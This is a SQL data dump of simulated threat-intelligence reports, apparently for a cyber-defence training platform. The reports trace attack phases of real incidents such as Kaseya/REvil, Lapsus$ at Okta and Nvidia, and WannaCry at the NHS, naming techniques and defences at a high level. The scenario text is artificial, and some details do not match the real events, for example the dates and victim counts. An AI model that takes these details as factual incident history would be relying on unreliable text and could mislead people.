(377, 73, 857, 2, 'Persistence Mechanisms Established', '### Overview\nPost deployment of web shells, Hafnium has initiated multiple persistence techniques to maintain long-term access to targeted systems.\n\n### Detailed Findings\n- **Techniques Used:** Scheduled tasks and registry modifications to re-invoke the web shells upon system reboot.\n- **Persistence Indicators:** Unfamiliar tasks scheduled under `System32\\Tasks\\` with suspicious names.\n\n### Recommended Actions\n- **Investigation:** Review all scheduled tasks for legitimacy and remove any unauthorized entries.\n- **Security Enhancement:** Strengthen monitoring of task creation and registry changes.\n\n### Future Considerations\nMonitor for potential lateral movement activities as attackers may attempt to access additional systems within the network.', '2026-01-15 00:50:02'),
(378, 73, 858, 3, 'Detecting Lateral Movement', '### Overview\nLateral movement has been detected, indicating Hafnium\'s attempt to expand their foothold within the network infrastructure.\n\n### Detailed Findings\n- **Movement Path:** Attackers are leveraging compromised credentials and employing tools like WMI and PsExec to navigate between systems.\n- **Targets:** Systems with elevated privileges or sensitive data repositories.\n\n### Recommended Actions\n- **Immediate Response:** Disable compromised accounts and enforce a password reset for all sensitive accounts.\n- **Network Segmentation:** Implement stricter network segmentation to limit movement capabilities.\n\n### Lessons Learned\nUnderstanding the scope of lateral movement techniques can aid in preemptive defense strategies. Future training should focus on identifying early indicators of such activities.', '2026-01-15 00:50:02'),
(379, 73, 859, 4, NULL, NULL, '2026-01-15 00:50:02'),
(380, 74, 860, 1, 'Malicious Script Execution on Endpoint', '## Context\nFollowing the detection of suspicious network activity, further analysis identified the execution of a malicious script on multiple endpoints within the network. This script is believed to be part of the REvil\'s toolkit for infiltrating systems through the Kaseya VSA platform.\n\n## Details\n- **Script Name**: `agentupdate.exe`\n- **Execution Time**: 2023-10-15 08:45:00 UTC\n- **Endpoints Affected**: 12\n- **Indicators of Compromise (IoCs)**: Network traffic to known REvil command and control (C2) servers.\n\n## Next Steps\nInvestigate the persistence mechanisms the script might have established to maintain access.', '2026-01-15 00:50:29'),
(381, 74, 861, 2, 'Persistence Mechanism Identified', '## Context\nPost identification of the malicious script execution, analysis has revealed that the attackers have employed sophisticated persistence mechanisms to ensure continuous access to compromised systems.\n\n## Details\n- **Methods Used**:\n  - Registry Key Modification\n  - Scheduled Tasks Creation\n- **Notable Entries**:\n  - Registry Key: `HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater`\n  - Scheduled Task: `Update Service - Daily`\n\n## Next Steps\nFocus efforts on monitoring unauthorized access to internal systems as attackers may attempt lateral movement.', '2026-01-15 00:50:29'),
(382, 74, 862, 3, 'Unauthorized Access to Internal Systems', '## Context\nFollowing the establishment of persistence, unauthorized attempts to access internal systems have been recorded. These attempts are consistent with lateral movement tactics typically employed by REvil.\n\n## Details\n- **Systems Targeted**: Finance Server, HR Database\n- **Successful Access**: Yes, on Finance Server\n- **Tactics Used**: Pass-the-Hash, Credential Dumping\n- **Time of Access**: 2023-10-16 02:30:00 UTC\n\n## Next Steps\nInitiate immediate measures to detect and prevent potential data exfiltration efforts.', '2026-01-15 00:50:29'),
(383, 74, 863, 4, 'Data Exfiltration Detected', '## Context\nIn the wake of unauthorized access, data exfiltration activities have been detected. The attackers are suspected of extracting sensitive information from compromised systems.\n\n## Details\n- **Data Types**: Financial records, Employee personal data\n- **Exfiltration Method**: Encrypted data packet transfer over HTTPS protocols\n- **Volume**: Approx. 2GB\n- **Destination**: External server located in Eastern Europe\n\n## Next Steps\nEngage in incident response protocols to mitigate further data loss and begin forensic analysis to assess the full scope of the breach.', '2026-01-15 00:50:29'),
(384, 74, 864, 5, NULL, NULL, '2026-01-15 00:50:29'),
(385, 75, 865, 1, 'Analysis of Initial Access: Phishing Campaign', '## Overview\nFollowing the detection of the initial access vector, a detailed analysis of the phishing campaign used by Sandworm has been conducted.\n\n### Key Findings\n- **Targeted Individuals**: The spear-phishing emails were meticulously crafted, targeting key personnel within the Ukrainian power grid sector.\n- **Email Content**: The emails contained malicious attachments disguised as official documents from trusted entities.\n- **Exploit Details**: The attached documents leveraged known vulnerabilities in outdated software versions.\n\n### Implications\nUnderstanding the intricacies of the phishing campaign provides critical insight into the social engineering tactics employed by Sandworm. This knowledge is essential for anticipating further malware deployment strategies.', '2026-01-15 00:52:49'),
(386, 75, 866, 2, 'Execution of Industroyer Malware: Technical Breakdown', '## Overview\nPost initial access, the execution phase of the Industroyer malware was set in motion.\n\n### Malware Capabilities\n- **ICS Protocols Targeted**: The malware is capable of interfacing with multiple industrial control systems (ICS), including IEC 60870-5-101, IEC 60870-5-104, and IEC 61850.\n- **Payloads**: Specialized payloads are crafted to manipulate circuit breaker operations, causing power outages.\n\n### Recommendations\nA thorough understanding of the malware\'s execution mechanisms is pivotal to devising effective countermeasures against its propagation and persistence.', '2026-01-15 00:52:49'),
(387, 75, 867, 3, 'Persistence Mechanisms: Backdoor Analysis', '## Overview\nThe establishment of persistence through backdoors is a critical phase in maintaining long-term access.\n\n### Backdoor Variants\n- **Types**: Multiple backdoor variants were identified, including SSH-based and custom protocols.\n- **Functionality**: These backdoors facilitate remote access and command execution within the compromised network.\n\n### Defensive Measures\nIdentifying and neutralizing these backdoors is crucial for preventing unauthorized access and mitigating lateral movement across the network.', '2026-01-15 00:52:49'),
(388, 75, 868, 4, 'Lateral Movement Tactics: Network Propagation Analysis', '## Overview\nLateral movement within the network allowed Sandworm to reach critical substations and ICS components.\n\n### Techniques Used\n- **Credential Harvesting**: Compromised credentials were used to navigate the network stealthily.\n- **Remote Execution**: Tools like PsExec and WMIC were employed for remote execution and system manipulation.\n\n### Mitigation Strategies\nStrengthening network segmentation and implementing robust monitoring can help identify and halt lateral movements before critical systems are compromised.', '2026-01-15 00:52:49'),
(389, 75, 869, 5, 'Data Exfiltration: Insights and Prevention', '## Overview\nData exfiltration was a pivotal step preceding the final disruptive attack on the power grid.\n\n### Data Types Exfiltrated\n- **Control System Schematics**: Detailed blueprints of the grid\'s operational infrastructure.\n- **Operational Logs**: Logs containing sensitive operational data were extracted.\n\n### Preventative Measures\nDeploying advanced anomaly detection systems can help in early identification of data exfiltration activities, thereby safeguarding critical control system data from being compromised.', '2026-01-15 00:52:49'),
(390, 75, 870, 6, NULL, NULL, '2026-01-15 00:52:49'),
(391, 76, 871, 1, 'Unauthorized Command Execution via Compromised AWS Instance', '### Overview\nFollowing the initial access through the SSRF vulnerability, the adversary **executed unauthorized commands** within the compromised AWS environment. This activity indicates an attempt to gain further control over the system.\n\n### Key Findings:\n- **Command Execution Patterns**: Evidence shows a series of commands aimed at exploring the environment and identifying further vulnerabilities.\n- **Tools Utilized**: Likely use of common penetration testing tools tailored for AWS environments.\n\n### Implications:\nThe execution of these commands suggests the adversary\'s goal to escalate privileges and explore further opportunities within the cloud infrastructure.', '2026-01-15 00:53:58'),
(392, 76, 872, 2, 'Establishing Persistence via IAM Role Exploitation', '### Overview\nAfter executing unauthorized commands, the threat actor has likely focused on establishing persistence in the compromised environment by exploiting IAM roles.\n\n### Key Findings:\n- **IAM Role Abuse**: The adversary exploited misconfigured IAM roles to gain persistent access.\n- **Credential Access**: Temporary credentials were likely extracted to ensure continued access.\n\n### Implications:\nThe establishment of persistence indicates the adversary\'s intent to maintain long-term access and potentially move laterally within the cloud environment.', '2026-01-15 00:53:58'),
(393, 76, 873, 3, 'Lateral Movement towards Sensitive Data Stores', '### Overview\nWith persistence established, the adversary has begun moving laterally within the cloud environment, targeting sensitive data stores.\n\n### Key Findings:\n- **Target Identification**: The adversary has identified and accessed several critical data stores.\n- **Movement Patterns**: Movement was characterized by systematic exploration of network paths and access points.\n\n### Implications:\nLateral movement towards sensitive data indicates preparation for data exfiltration, revealing the adversary\'s broader objectives.', '2026-01-15 00:53:58'),
(394, 76, 874, 4, 'Data Exfiltration of Critical Information', '### Overview\nThe final stage of the attack involved the exfiltration of sensitive data from the compromised environment.\n\n### Key Findings:\n- **Data Types**: Extracted data includes personally identifiable information (PII) and financial records.\n- **Exfiltration Channels**: Utilized encrypted channels to obscure data transfer activities.\n\n### Implications:\nThe successful exfiltration of data represents a significant breach of confidentiality, with potential impacts on regulatory compliance and reputational damage.', '2026-01-15 00:53:58'),
(395, 76, 875, 5, NULL, NULL, '2026-01-15 00:53:58'),
(396, 77, 876, 1, 'Analysis of Initial Access via Social Engineering', '### Context\nFollowing the **Suspicious Login Attempt Detected** alert, we have identified that the initial access was gained through carefully crafted social engineering tactics. Attackers impersonated IT staff to extract credentials from key Twitter employees.\n\n### Findings\n- **Methodology**: Phishing emails were used to direct employees to a fake login page.\n- **Targeted Accounts**: Focus was on employees with administrative privileges.\n\n### Next Steps\nMonitor for any unauthorized use of admin tools that might suggest deeper system infiltration.', '2026-01-15 00:55:54');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(397, 77, 877, 2, 'Unauthorized Use of Admin Tools: Execution Phase', '### Context\nAfter detecting the **Unauthorized Use of Admin Tools**, it appears the attackers escalated privileges to execute further actions, including access to high-profile accounts.\n\n### Findings\n- **Admin Tools Accessed**: Tools used to manage and reset account credentials.\n- **Accounts Compromised**: High-profile accounts, including public figures and companies.\n\n### Next Steps\nFocus on identifying any signs of persistence mechanisms established by the attackers to maintain access.', '2026-01-15 00:55:54'),
(398, 77, 878, 3, 'Persistence Mechanisms: Maintaining Access', '### Context\nThe **Creation of Persistent Access Channels** alert indicates that attackers have implemented mechanisms to retain access to the compromised environment.\n\n### Findings\n- **Persistence Tactics**: Creation of backup access accounts and modification of system logs to avoid detection.\n- **Security Measures Bypassed**: Attackers likely exploited unpatched vulnerabilities.\n\n### Next Steps\nInvestigate any unusual cryptocurrency transfer activity to trace the exfiltration of funds.', '2026-01-15 00:55:54'),
(399, 77, 879, 4, NULL, NULL, '2026-01-15 00:55:54'),
(400, 78, 880, 1, 'Analysis of OAuth Token Anomalies', '## Context\nFollowing the unauthorized certificate access, APT29 appears to be leveraging compromised credentials to request OAuth tokens from Microsoft 365 environments, indicating a potential cloud exploitation strategy.\n\n## Key Findings\n- **Increased Token Requests**: A surge in OAuth token requests has been observed, correlating with accounts previously flagged for suspicious activity.\n- **Targeted Accounts**: High-value accounts, particularly those with administrative privileges, seem to be the primary targets.\n\n## Next Steps\n- Investigate the source and pattern of these OAuth token requests.\n- Monitor account activity for further indicators of compromise.', '2026-01-15 00:56:34'),
(401, 78, 881, 2, 'Detection of Backdoor Installation Techniques', '## Context\nAfter the suspicious OAuth token requests, evidence suggests APT29 is establishing persistence through the installation of backdoors.\n\n## Key Findings\n- **Backdoor Variants**: Several novel backdoor variants have been detected, designed to evade common detection mechanisms.\n- **Persistence Mechanisms**: Techniques such as registry manipulation and scheduled tasks have been employed to maintain access.\n\n## Next Steps\n- Conduct a thorough forensic analysis of affected systems.\n- Develop and deploy updated detection signatures for identified backdoor variants.', '2026-01-15 00:56:34'),
(402, 78, 882, 3, 'Investigation of Lateral Movement Techniques', '## Context\nPost-backdoor installation, APT29 seems to be executing lateral movement strategies to broaden their access within the network.\n\n## Key Findings\n- **Movement Patterns**: Use of legitimate administrative tools has been observed to facilitate lateral movement while minimizing detection.\n- **Target Expansion**: Systems with sensitive data storage have been prioritized in these lateral movement activities.\n\n## Next Steps\n- Implement network segmentation to contain potential lateral movement.\n- Enhance monitoring of administrative tool usage across the environment.', '2026-01-15 00:56:34'),
(403, 78, 883, 4, 'Details of Data Exfiltration Attempt', '## Context\nFollowing the unusual lateral movement activity, there are indications of an attempted data exfiltration by APT29.\n\n## Key Findings\n- **Exfiltration Vector**: Data was primarily targeted for extraction via encrypted channels to external servers.\n- **Data Types**: Intellectual property and sensitive internal communications were among the targeted data.\n\n## Next Steps\n- Block the identified exfiltration channels and monitor for any new attempts.\n- Conduct a full audit of data access logs to assess the potential impact.', '2026-01-15 00:56:34'),
(404, 78, 884, 5, NULL, NULL, '2026-01-15 00:56:34'),
(405, 79, 885, 1, 'Phishing Campaign Execution via Slack', '### Overview\nFollowing the initial access gained through an MFA fatigue attack, the threat actors initiated a phishing campaign targeting Uber employees via Slack.\n\n### Details\n- **Objective:** The attackers aimed to harvest additional credentials and further compromise the internal network.\n- **Tactics:**\n  - Used convincing messages that mimicked Uber\'s IT department.\n  - Embedded malicious links within the messages.\n\n### Indicators of Compromise (IoCs)\n- Unusual Slack message activity originating from compromised accounts.\n- External IP addresses accessing internal Slack channels.\n\n### Recommendations\n- Conduct immediate awareness training for employees.\n- Implement stringent verification for internal communications.', '2026-01-15 00:57:25'),
(406, 79, 886, 2, 'Persistence through Credential Dumping', '### Overview\nPost-phishing campaign, the threat actors focused on establishing persistence by dumping compromised credentials.\n\n### Details\n- **Tools Used:** Utilized Mimikatz and other credential dumping tools.\n- **Targets:** Key personnel with elevated privileges.\n\n### Indicators of Compromise (IoCs)\n- Unauthorized access to credential stores.\n- Sudden, unexplained privilege escalations.\n\n### Recommendations\n- Regularly monitor for anomalous login attempts.\n- Enforce password changes for affected accounts.', '2026-01-15 00:57:25'),
(407, 79, 887, 3, 'Lateral Movement and Internal Reconnaissance', '### Overview\nWith persistence established, the attackers began lateral movement to identify and access critical systems.\n\n### Details\n- **Tactics:**\n  - Systematically scanned the network for vulnerabilities.\n  - Accessed privileged systems to map out security protocols.\n\n### Indicators of Compromise (IoCs)\n- Network scanning activities.\n- Access logs showing connections to sensitive systems.\n\n### Recommendations\n- Implement network segmentation to limit lateral movement.\n- Enhance monitoring for unusual internal traffic.', '2026-01-15 00:57:25'),
(408, 79, 888, 4, 'Exfiltration of HackerOne Reports', '### Overview\nThe attackers targeted Uber\'s vulnerability disclosure program, exfiltrating sensitive HackerOne reports.\n\n### Details\n- **Objective:** To gather exploit information and security weaknesses.\n- **Method:** Used compromised credentials to access and download reports.\n\n### Indicators of Compromise (IoCs)\n- Data transfers to external IPs from internal vulnerability systems.\n- Access logs showing atypical download patterns.\n\n### Recommendations\n- Conduct an audit of access logs for sensitive systems.\n- Ensure encrypted channels for internal data handling.', '2026-01-15 00:57:25'),
(409, 79, 889, 5, 'Cover Tracks via Log Tampering', '### Overview\nTo mask their activities, the attackers tampered with logs to remove traces of their movements and actions.\n\n### Details\n- **Tactics:**\n  - Altered or deleted logs from critical systems.\n  - Used scripts to automate log-cleaning processes.\n\n### Indicators of Compromise (IoCs)\n- Inconsistencies in log files.\n- Missing logs from key timeframes.\n\n### Recommendations\n- Implement immutable logging solutions.\n- Regularly backup logs to secure, offsite locations.', '2026-01-15 00:57:25'),
(410, 79, 890, 6, 'Public Disclosure and Exploitation', '### Overview\nIn the final stage, the threat actors publicly disclosed the breach, leveraging stolen data for further exploitation.\n\n### Details\n- **Actions Taken:**\n  - Released sensitive information on forums.\n  - Used the data to exploit Uber\'s brand and operations.\n\n### Implications\n- Potential reputational damage.\n- Increased risk of targeted attacks against affected individuals.\n\n### Recommendations\n- Engage with PR and legal teams to manage public response.\n- Monitor for further exploitation attempts using disclosed data.', '2026-01-15 00:57:25'),
(411, 79, 891, 7, NULL, NULL, '2026-01-15 00:57:25'),
(412, 80, 892, 1, 'Detailed Analysis of Initial Access: DevOps Engineer\'s Network Breach', '### Context\nThe suspicious login detected on the DevOps engineer\'s home network suggests a potentially targeted attack vector. The engineer\'s credentials might have been compromised through phishing or credential stuffing techniques.\n\n### Next Steps\n- **Monitor**: Increase vigilance on the engineer\'s network activity and implement multi-factor authentication (MFA) if not already active.\n- **Investigate**: Examine recent emails and messages for phishing attempts.\n- **Prepare**: Anticipate possible malicious actions following this initial access, focusing on the execution phase.', '2026-01-15 00:59:55'),
(413, 80, 893, 2, 'Execution Phase: Malicious Script Analysis', '### Context\nThe execution of a malicious script on the compromised machine indicates the attacker has transitioned from initial access to active exploitation. The script appears to have been designed to establish persistence and further compromise the system.\n\n### Insights\n- The script likely downloaded additional payloads or modified system settings to evade detection.\n- The origin of the script should be traced, possibly exploiting a known vulnerability or an unpatched system.\n\n### Next Steps\n- **Contain**: Isolate the compromised machine to prevent further lateral movement.\n- **Analyze**: Reverse-engineer the script to understand its functionality and objectives.\n- **Plan**: Prepare for potential persistence mechanisms being activated.', '2026-01-15 00:59:55'),
(414, 80, 894, 3, 'Persistence Mechanism Activation: Backdoor Analysis', '### Context\nThe activation of a backdoor persistence mechanism signifies that the attacker has established a foothold within the system, ensuring continued access even if initial entry points are closed.\n\n### Insights\n- Common persistence methods include registry changes, scheduled tasks, and system service modifications.\n- The backdoor may facilitate lateral movement towards more sensitive areas of the network.\n\n### Next Steps\n- **Identify**: Locate and document all persistence mechanisms implemented by the attacker.\n- **Mitigate**: Develop a removal and prevention strategy to close these backdoors.\n- **Prepare**: Anticipate unauthorized access attempts to the corporate cloud environment as the next phase.', '2026-01-15 00:59:56'),
(415, 80, 895, 4, 'Lateral Movement: Corporate Cloud Environment Breach', '### Context\nUnauthorized access to the corporate cloud environment represents a significant escalation, potentially compromising sensitive company and user data.\n\n### Insights\n- The attacker has likely leveraged compromised credentials or exploited cloud misconfigurations.\n- The focus should now be on detecting and responding to further data exfiltration attempts.\n\n### Next Steps\n- **Audit**: Perform a thorough review of cloud access logs and permissions.\n- **Contain**: Restrict access and reset credentials to limit the attacker\'s movement.\n- **Prepare**: Be vigilant for the extraction of encryption keys from cloud storage.', '2026-01-15 00:59:56'),
(416, 80, 896, 5, 'Exfiltration and Risk Assessment: Encryption Key Security', '### Context\nThe extraction of encryption keys from cloud storage marks a critical point in the breach, directly threatening the security of user data.\n\n### Insights\n- Encryption keys are vital for protecting user data, and their compromise could lead to widespread data decryption and exposure.\n- Attention should now turn towards assessing the potential impact on user master passwords and overall data integrity.\n\n### Next Steps\n- **Secure**: Immediately rotate all encryption keys and update security protocols.\n- **Assess**: Conduct a comprehensive risk assessment to determine the potential exposure of user data.\n- **Inform**: Communicate with affected users and stakeholders about the potential risks and mitigation steps being taken.', '2026-01-15 00:59:56'),
(417, 80, 897, 6, NULL, NULL, '2026-01-15 00:59:56'),
(418, 81, 898, 1, 'Execution of Unauthorized Scripts Detected', '### Overview\nFollowing the suspicious login from the third-party contractor, we have detected the execution of unauthorized scripts within the Okta environment. These scripts appear to be designed to escalate privileges and probe for vulnerabilities.\n\n### Details\n- **Time of Detection:** 14:32 GMT\n- **Scripts Identified:** Shell scripts targeting user authentication mechanisms\n- **Source:** Compromised contractor account\n\n### Next Steps\nMonitoring will focus on identifying any persistence mechanisms, such as backdoor deployments, that may have been established through these scripts.', '2026-01-15 00:59:58'),
(419, 81, 899, 2, 'Backdoor Deployment Detected for Persistent Access', '### Overview\nThe unauthorized scripts execution has led to the deployment of a backdoor within Okta\'s infrastructure. This backdoor is designed to provide Lapsus$ with persistent access to the network.\n\n### Details\n- **Backdoor Location:** Embedded within the SuperUser portal\n- **Method of Deployment:** Modification of existing scripts\n- **Persistence Indicators:** Scheduled tasks running at irregular intervals\n\n### Next Steps\nFocus will now shift to monitoring lateral movement across Okta\'s systems as attackers may attempt to access additional resources.', '2026-01-15 00:59:58'),
(420, 81, 900, 3, 'Lateral Movement Across Okta\'s Systems Identified', '### Overview\nEvidence of lateral movement has been detected as attackers utilize the backdoor to traverse Okta\'s network. This movement is aimed at accessing sensitive areas and expanding control.\n\n### Details\n- **Movement Patterns:** Utilization of compromised credentials\n- **Targeted Systems:** Customer databases and administrative tools\n- **Anomalies:** Increased traffic between internal systems\n\n### Next Steps\nThe primary concern now is the potential exfiltration of customer data. Measures are being taken to protect sensitive information.', '2026-01-15 00:59:58'),
(421, 81, 901, 4, 'Exfiltration of Customer Data Detected', '### Overview\nThe attackers have successfully exfiltrated data from Okta\'s systems, specifically targeting the customer databases. Immediate action is required to mitigate damage and notify affected parties.\n\n### Details\n- **Data Exfiltrated:** Customer credentials and personal information\n- **Method of Exfiltration:** Encrypted data transfers to external servers\n- **Volume:** Approximately 366 customer records\n\n### Next Steps\nAn analysis of supply chain trust implications is necessary to understand the broader impact and prevent future breaches.', '2026-01-15 00:59:58'),
(422, 81, 902, 5, 'Supply Chain Trust Implications Analysis', '### Overview\nFollowing the exfiltration of customer data, an analysis has been conducted on the implications for Okta\'s supply chain trust. This breach highlights vulnerabilities in third-party access management.\n\n### Details\n- **Risk Factors:** Over-reliance on third-party contractors\n- **Impact:** Potential loss of trust from affected customers\n- **Recommendations:** Implement stricter access controls and continuous monitoring of third-party activities\n\n### Conclusion\nStrengthening supply chain security is critical to preventing similar breaches in the future. Immediate steps will be taken to address existing vulnerabilities.', '2026-01-15 00:59:58'),
(423, 81, 903, 6, NULL, NULL, '2026-01-15 00:59:58'),
(424, 82, 904, 1, 'Report on Phishing Techniques Utilized by Lapsus$', '### Overview\nFollowing the initial alert of a network breach via phishing, our team has investigated the tactics employed by Lapsus$ to infiltrate Nvidia\'s network.\n\n### Phishing Methodology\nLapsus$ utilized highly targeted spear-phishing emails that impersonated Nvidia\'s IT department. These emails contained malicious links that redirected victims to a counterfeit login page, capturing their credentials.\n\n### Key Indicators\n- **Email Headers**: Look for unusual sender domains.\n- **Link Analysis**: Check for domain discrepancies.\n\n### Next Steps\nPrepare for potential malware deployment as stolen credentials could be used to introduce malicious software into the network.', '2026-01-15 01:00:55'),
(425, 82, 905, 2, 'Analysis of Malware Deployment and Credential Harvesting', '### Overview\nPost-phishing, Lapsus$ deployed malware to harvest credentials from infected systems.\n\n### Malware Characteristics\nThe malware, identified as a variant of RedLine Stealer, was designed to extract passwords, session tokens, and sensitive files from compromised devices.\n\n### Indicators of Compromise\n- **Unusual Network Traffic**: Outbound connections to C2 servers.\n- **Altered System Files**: Presence of unauthorized executables.\n\n### Next Steps\nFocus on identifying persistence mechanisms that the threat actors might employ to maintain access to the network.', '2026-01-15 01:00:55'),
(426, 82, 906, 3, 'Persistence Mechanisms and Backdoor Establishment by Lapsus$', '### Overview\nLapsus$ has established persistence within Nvidia’s systems by deploying backdoors.\n\n### Backdoor Techniques\nThe group used a combination of registry modifications and scheduled tasks to maintain access.\n\n### Defensive Measures\n- **Audit Scripts**: Regularly check for unauthorized tasks or scripts.\n- **Registry Monitoring**: Implement alerts for registry changes.\n\n### Next Steps\nPrepare for lateral movement attempts as the attackers may try to access additional network resources.', '2026-01-15 01:00:55'),
(427, 82, 907, 4, 'Lateral Movement Strategies and Network Exploration', '### Overview\nLapsus$ has begun lateral movement within the network, targeting critical systems.\n\n### Movement Tactics\nUtilizing stolen credentials and exploiting SMB vulnerabilities, Lapsus$ is accessing sensitive areas of the network.\n\n### Mitigation Strategies\n- **Network Segmentation**: Limit access between different network segments.\n- **Credential Hygiene**: Enforce multi-factor authentication.\n\n### Next Steps\nMonitor for large data transfers indicative of data exfiltration attempts.', '2026-01-15 01:00:55'),
(428, 82, 908, 5, 'Data Exfiltration Tactics and 1TB Loss Analysis', '### Overview\nLapsus$ has successfully exfiltrated 1TB of proprietary data from Nvidia\'s network.\n\n### Exfiltration Channels\nData was compressed and exfiltrated via encrypted connections to external servers.\n\n### Impact Assessment\nThe stolen data includes sensitive designs and confidential project files, posing significant intellectual property risks.\n\n### Next Steps\nExpect extortion attempts or demands related to the stolen data.', '2026-01-15 01:00:55'),
(429, 82, 909, 6, 'Extortion Demands and Public Spectacle Tactics', '### Overview\nLapsus$ has issued extortion demands, threatening to release data unless Nvidia complies with their demands for open-source drivers.\n\n### Extortion Details\n- **Demands**: Public release of proprietary drivers\n- **Threats**: Leak of sensitive data if demands are unmet\n\n### Spectacle Tactics\nLapsus$ is leveraging social media platforms to publicly pressure Nvidia and gain notoriety.\n\n### Recommended Actions\n- **Public Relations Strategy**: Develop a communication plan to address potential leaks.\n- **Legal Measures**: Coordinate with law enforcement and legal teams to address the extortion.', '2026-01-15 01:00:55'),
(430, 82, 910, 7, NULL, NULL, '2026-01-15 01:00:55'),
(431, 84, 911, 1, 'Analysis of Initial Access via Phishing', '### Report: Initial Access via Phishing\n\n**Summary:**\nThe first phase of the Conti ransomware attack on Costa Rica was initiated through a sophisticated phishing campaign. Emails containing malicious attachments or links were sent to various government employees, masquerading as official communications.\n\n**Technical Details:**\n- **Sender:** Spoofed email addresses mimicking legitimate government domains.\n- **Attachments/Links:** Contained malicious payloads designed to execute upon interaction.\n- **Indicators of Compromise (IOCs):**\n  - Known malicious domains used for phishing.\n  - Hashes of malicious attachments.\n\n**Recommendations:**\n- Immediate education and awareness training for government employees.\n- Implementation of robust email filtering and phishing detection solutions.\n\nThe next phase involves analyzing the execution of the malicious scripts detected within the network.', '2026-01-15 01:02:55'),
(432, 84, 912, 2, 'Detection of Malicious Script Execution', '### Report: Malicious Script Execution Detected\n\n**Summary:**\nFollowing the initial phishing attack, malicious scripts were executed across compromised systems. These scripts were designed to establish a foothold for further malicious activities.\n\n**Technical Details:**\n- **Script Language:** Predominantly PowerShell and batch scripts.\n- **Functionality:**\n  - Download and execution of additional malware components.\n  - Disabling of security measures.\n- **IOCs:**\n  - Script hashes and command-line arguments.\n\n**Recommendations:**\n- Monitor for unusual script execution activities.\n- Enhance endpoint detection and response (EDR) capabilities.\n\nThe subsequent report will focus on the persistence mechanisms detected within the network, establishing a backdoor for continued access.', '2026-01-15 01:02:55'),
(433, 84, 913, 3, 'Establishment of Persistence Mechanism', '### Report: Persistence Mechanism Established\n\n**Summary:**\nThe attackers succeeded in installing backdoors on several compromised systems, ensuring persistent access even after system reboots or network changes.\n\n**Technical Details:**\n- **Backdoor Types:** Custom-built remote access tools (RATs) and modified legitimate software.\n- **Installation Methods:**\n  - Scheduled tasks.\n  - Registry modifications.\n  - Service creation.\n- **IOCs:**\n  - Network traffic patterns indicative of RAT communication.\n  - Unusual registry keys and scheduled tasks.\n\n**Recommendations:**\n- Conduct thorough system audits and backdoor hunting.\n- Reinforce network segmentation to limit lateral movement.\n\nThe upcoming report will delve into the lateral movement activities, detailing how attackers progressed to multiple ministries through credential theft.', '2026-01-15 01:02:55'),
(434, 84, 914, 4, NULL, NULL, '2026-01-15 01:02:55'),
(435, 83, 915, 1, 'Initial Access Overview', '### Unauthorized Access Detected on Samsung Network\n\n**Summary:**\nThe initial unauthorized access to Samsung\'s network was detected via anomalous login patterns. Analysts have confirmed the use of compromised credentials likely obtained through a phishing campaign targeting Samsung employees.\n\n**Next Steps:**\n- Monitor for any script execution that may indicate further malicious activity.\n- Conduct an internal audit to identify other potentially compromised accounts.\n\n**Recommendations:**\n- Implement multi-factor authentication (MFA) across all user and admin accounts.\n- Enhance phishing awareness training for employees.', '2026-01-15 01:03:01'),
(436, 83, 916, 2, 'Malicious Script Execution Analysis', '### Malicious Script Execution Identified\n\n**Summary:**\nFollowing initial access, a malicious script was executed on several workstations within the Samsung network. This script is suspected to have been used to deploy additional payloads and establish persistence.\n\n**Next Steps:**\n- Investigate the deployment of any unauthorized backdoors on critical servers.\n- Analyze the script to determine its full capabilities and potential impact.\n\n**Recommendations:**\n- Implement endpoint detection and response (EDR) solutions to monitor for script-based attacks.\n- Conduct regular security audits of server configurations.', '2026-01-15 01:03:01'),
(437, 83, 917, 3, 'Backdoor Establishment Investigation', '### Backdoor Established on Critical Servers\n\n**Summary:**\nThe investigation has confirmed the establishment of a backdoor on Samsung\'s critical servers. This backdoor allows for remote access, facilitating further malicious activities and potential data exfiltration.\n\n**Next Steps:**\n- Monitor for any lateral movement within the development environment, indicating the attacker\'s attempt to expand their access.\n- Conduct a thorough forensic analysis of affected servers to profile the backdoor.\n\n**Recommendations:**\n- Isolate compromised servers and begin incident response procedures.\n- Update and patch all systems to mitigate known vulnerabilities.', '2026-01-15 01:03:01'),
(438, 83, 918, 4, 'Lateral Movement and Exfiltration Concerns', '### Lateral Movement Across Development Environment\n\n**Summary:**\nThe attackers have begun moving laterally across Samsung\'s development environment, indicating a search for valuable data and intellectual property. This movement suggests an imminent risk of data exfiltration.\n\n**Next Steps:**\n- Deploy network monitoring to detect and prevent large-scale data transfers to external servers.\n- Increase security on sensitive data repositories to prevent unauthorized access.\n\n**Recommendations:**\n- Implement network segmentation to limit lateral movement.\n- Educate development teams on secure coding practices and data handling.', '2026-01-15 01:03:01'),
(439, 83, 919, 5, NULL, NULL, '2026-01-15 01:03:01'),
(440, 85, 920, 1, 'Analysis of Initial SMB Exploitation', '### Context\nThe Lazarus Group initiated their attack on the NHS systems by exploiting a known SMB vulnerability. This vulnerability, identified as CVE-2017-0144, allowed the attackers to gain unauthorized access to the network.\n\n### Insight\nThe affected systems were primarily those that had not received the necessary security patches. The EternalBlue exploit was used to take advantage of the unpatched systems, highlighting the critical need for timely updates and patches.\n\n### Next Steps\nPrepare for potential malware deployment as the attackers have successfully accessed the network.', '2026-01-15 01:03:39'),
(441, 85, 921, 2, 'Deployment of WannaCry Ransomware', '### Context\nFollowing the successful exploitation of the SMB vulnerability, the attackers deployed the WannaCry ransomware across the NHS network.\n\n### Insight\nThe ransomware encrypted critical data, demanding a ransom in Bitcoin to decrypt the files. This deployment affected numerous systems, causing significant operational disruptions.\n\n### Next Steps\nInvestigate methods the attackers may use to maintain persistence within the network, potentially through scheduled tasks or other mechanisms.', '2026-01-15 01:03:39'),
(442, 85, 922, 3, 'Persistence Mechanisms Identified', '### Context\nThe attackers established persistence within the NHS network by utilizing scheduled tasks and other methods to ensure the ransomware could survive system reboots.\n\n### Insight\nBy creating scheduled tasks, the ransomware was able to reinitiate itself, complicating remediation efforts and prolonging the disruption.\n\n### Next Steps\nEfforts should focus on detecting lateral movement attempts as the attackers seek to propagate the ransomware across the network.', '2026-01-15 01:03:39'),
(443, 85, 923, 4, 'Lateral Movement and Network Propagation', '### Context\nThe ransomware began to propagate laterally across the NHS network, leveraging the same SMB vulnerability and exploiting other unpatched systems.\n\n### Insight\nThis propagation led to widespread system infections, significantly impacting hospital operations, including canceled surgeries and delayed patient care.\n\n### Next Steps\nFocus on mitigating the operational disruption and begin formulating an incident response plan to manage the crisis.', '2026-01-15 01:03:39'),
